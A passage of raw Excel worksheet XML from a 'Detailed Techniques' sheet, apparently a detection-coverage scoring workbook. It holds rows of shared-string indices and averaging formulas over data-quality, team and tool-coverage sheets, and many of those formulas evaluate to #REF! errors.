        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I55" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J55" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K55" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L55" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M55" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N55" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O55" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P55" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q55" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R55" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S55" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T55" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U55" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V55" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W55" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X55" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F55&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F55))-LEN(SUBSTITUTE(TRIM(F55),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y55" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="56" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A56" s="8" t="s">
        <v>60</v>
      </c>
      <c r="B56" s="8" t="s">
        <v>506</v>
      </c>
      <c r="C56" s="8" t="s">
        <v>507</v>
      </c>
      <c r="D56" s="10" t="s">
        <v>508</v>
      </c>
      <c r="E56" s="10" t="s">
        <v>509</v>
      </c>
      <c r="F56" s="10" t="s">
        <v>510</v>
      </c>
      <c r="G56" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K56,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H56" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I56" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J56" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K56" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L56" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M56" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N56" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O56" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P56" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q56" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R56" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S56" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T56" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U56" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V56" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W56" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X56" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F56&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F56))-LEN(SUBSTITUTE(TRIM(F56),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y56" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="57" spans="1:25" ht="228" x14ac:dyDescent="0.45">
      <c r="A57" s="8" t="s">
        <v>82</v>
      </c>
      <c r="B57" s="8" t="s">
        <v>511</v>
      </c>
      <c r="C57" s="8" t="s">
        <v>512</v>
      </c>
      <c r="D57" s="10" t="s">
        <v>513</v>
      </c>
      <c r="E57" s="10" t="s">
        <v>514</v>
      </c>
      <c r="F57" s="10" t="s">
        <v>515</v>
      </c>
      <c r="G57" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K57,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H57" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I57" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J57" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K57" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L57" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M57" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N57" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O57" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P57" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q57" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R57" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S57" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T57" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U57" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V57" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W57" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X57" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F57&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F57))-LEN(SUBSTITUTE(TRIM(F57),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y57" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="58" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A58" s="8" t="s">
        <v>83</v>
      </c>
      <c r="B58" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C58" s="8" t="s">
        <v>516</v>
      </c>
      <c r="D58" s="10" t="s">
        <v>517</v>
      </c>
      <c r="E58" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F58" s="10" t="s">
        <v>324</v>
      </c>
      <c r="G58" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K58,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H58" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I58" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J58" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K58" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L58" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M58" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N58" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O58" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P58" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q58" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R58" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S58" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T58" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U58" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V58" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W58" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X58" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F58&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F58))-LEN(SUBSTITUTE(TRIM(F58),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y58" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="59" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A59" s="8" t="s">
        <v>211</v>
      </c>
      <c r="B59" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C59" s="8" t="s">
        <v>518</v>
      </c>
      <c r="D59" s="10" t="s">
        <v>519</v>
      </c>
      <c r="E59" s="10" t="s">
        <v>520</v>
      </c>
      <c r="F59" s="10" t="s">
        <v>521</v>
      </c>
      <c r="G59" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K59,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H59" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I59" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J59" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K59" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L59" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M59" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N59" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O59" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P59" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q59" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R59" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S59" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T59" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U59" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V59" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W59" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X59" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F59&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F59))-LEN(SUBSTITUTE(TRIM(F59),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y59" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="60" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A60" s="8" t="s">
        <v>35</v>
      </c>
      <c r="B60" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C60" s="8" t="s">
        <v>522</v>
      </c>
      <c r="D60" s="10" t="s">
        <v>523</v>
      </c>
      <c r="E60" s="10" t="s">
        <v>524</v>
      </c>
      <c r="F60" s="10" t="s">
        <v>525</v>
      </c>
      <c r="G60" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K60,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H60" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I60" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J60" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K60" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L60" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M60" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N60" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O60" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P60" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q60" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R60" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S60" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T60" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F60&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F60))-LEN(SUBSTITUTE(TRIM(F60),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U60" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V60" s="20" t="e">
